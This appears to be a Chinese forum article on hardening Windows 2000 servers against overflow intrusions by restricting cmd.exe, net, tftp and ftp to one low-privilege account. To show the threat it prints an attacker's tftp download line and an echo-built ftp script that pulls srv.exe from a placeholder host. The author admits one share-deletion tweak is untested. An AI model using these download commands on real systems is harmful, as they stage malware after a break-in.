我相信但凡有接觸黑客或者安全這方面的朋友，都一定有接觸過溢出攻擊或接觸過這一類詞，也就是有了溢出攻擊，以及高手們所發(fā)布的溢出程序，才有了那么多的“快餐黑客”。

　　無可否認，溢出攻擊無論是對黑客，或者安全檢測人員來說，都是對一臺主機測試的時候所會采取的手段，因為溢出攻擊如果成功的話，可以令我們迅速獲取對方主機的一定權限。

　　但是，我們利用溢出就開心，但是網管呢，他可就慘了，尤其是一臺專門用來保護重要數(shù)據的主機如果給一些無良黑客，或應該說是駭客吧，他們入侵后，大量刪除數(shù)據，無論你有沒有備份數(shù)據，損失都是十分嚴重的，所以有效地打補丁倒也是一個好方法，但是，有時候你忘記了呢?或者不知道呢，又或者對方用的是0day Exploit呢!所以打補丁是有效，但不是唯一的方法。

　　但是我卻在看某安全雜志的時候，有一個牛人說到給cmd.exe設置權限，可以有效地防止溢出，再加上我和一些高手交流的時候，說到這個，他們也說理論上可以行得通，但是他們卻叫我試試。-_-#

　　好了，不再廢話了，下面說說怎么防止溢出。各位網管可要看仔細啦!

　　首先，我們可以建立一個用戶，名字就叫CmdUser,密碼就設置強壯一點，而且如果你追求完美的話，可以在用戶的名稱前面加上一個$.按照網上所公布的方法，建立一個隱藏帳戶，這樣，就算給人入侵了，也不會使用net user cmduser passworld 來修改這個用戶的密碼。記住哦，那個用戶必須是user等級的哦!

　　建立了用戶后，來到c:\winnt\system32,(這里系統(tǒng)安裝在C盤).找到cmd.exe,用右鍵打開屬性，在安全那里，如圖一所示

　　我們所要做的就是把所有的用戶刪除，然后添加CmdUser這個用戶，完成后就確定就可以了，但是不要以為這樣就可以了哦，還要找到net.exe這個按照cmd.exe的方法來設置，估計大家找到了net.exe的時候，發(fā)現(xiàn)旁邊還有一個net1.exe,這個也要設置哦，設置好了，不要以為松了一口氣，其實這樣雖然可以對付一些菜鳥黑客，但是，如果對方是老鳥來的話，他可以通過tftp，或者ftp等等來傳輸一個本地溢出的溢出程序，我們就game over了，或者他上傳一個木馬，利用替換服務這個方法呢，這個倒也是令人防不勝防啊

可能讀者就要問了，你既然提出來，是不是有方法解決啊，不錯!也算是一點點方法啦，下面就先說說tftp的方法，這個很簡單的，進入C:\WINNT\system32\drivers\etc，用記事本打開services這個文件，如圖2所示

　　把tftp這個端口修改為0.。這樣，入侵著就不會通過使用tftp –I Host get files.exe文件來達到傳輸自己的工具。當然，為了更好的安全性，我們可以通過搜索tftp.exe這個文件，然后把tftp這個執(zhí)行文件按照cmd。exe那樣，添加成為只有cmduser這個用戶才可以使用。下面就再說說另外一個方法。

　　我相信，大家應該還記得一個使用echo命令來利用ftp來下載東西的命令吧，什么?你不知道?我來說一下：

　　echo open xxx.xxx.xxx.xxx >ftp.txt
　　echo user >>ftp.txt
　　echo password >>ftp.txt
　　echo get srv.exe >>ftp.txt
　　echo bye >>ftp.txt
　　
　　ftp -s:ftp.txt
　　del ftp.txt

　　這樣就可以把srv.exe這個軟件下載了，我們也可以按照cmd的方法，通過把ftp的使用權限分配給cmduser，這樣的話，就可以避免給對方上傳軟件了，其實還是有很多方法可以上傳的，但是我還是留下了一些思路給讀者，因為，只有這樣，我們才可以提高自己的技術。另外呢，可能有些朋友可能會利用以下這么一個腳本來關閉ipc$默認共享：

　　@echo off
　　net share c$ /del
　　net share d$ /del
　　net share e$ /del
　　net share f$ /del
　　net share ipc$ /del
　　net share admin$ /del
　　@cls

　　但是我們這樣設置的話，可能會令到他們覺得很麻煩，所以，我們是不是可以在最后面那里加上一個 net start explorer ,然后做成開機腳本，這樣可能會好一點哦，為什么說可能呢?因為我由于時間關系，所以沒有來得及試驗，希望試驗成功的朋友到論壇發(fā)表一下你的看法!

　　下次有機會的話，我可能還說說怎么防止sql injection.。如果試驗的過程中還是有什么疑問的話，歡迎e-mail to :ytt@hackbase.net

最新評論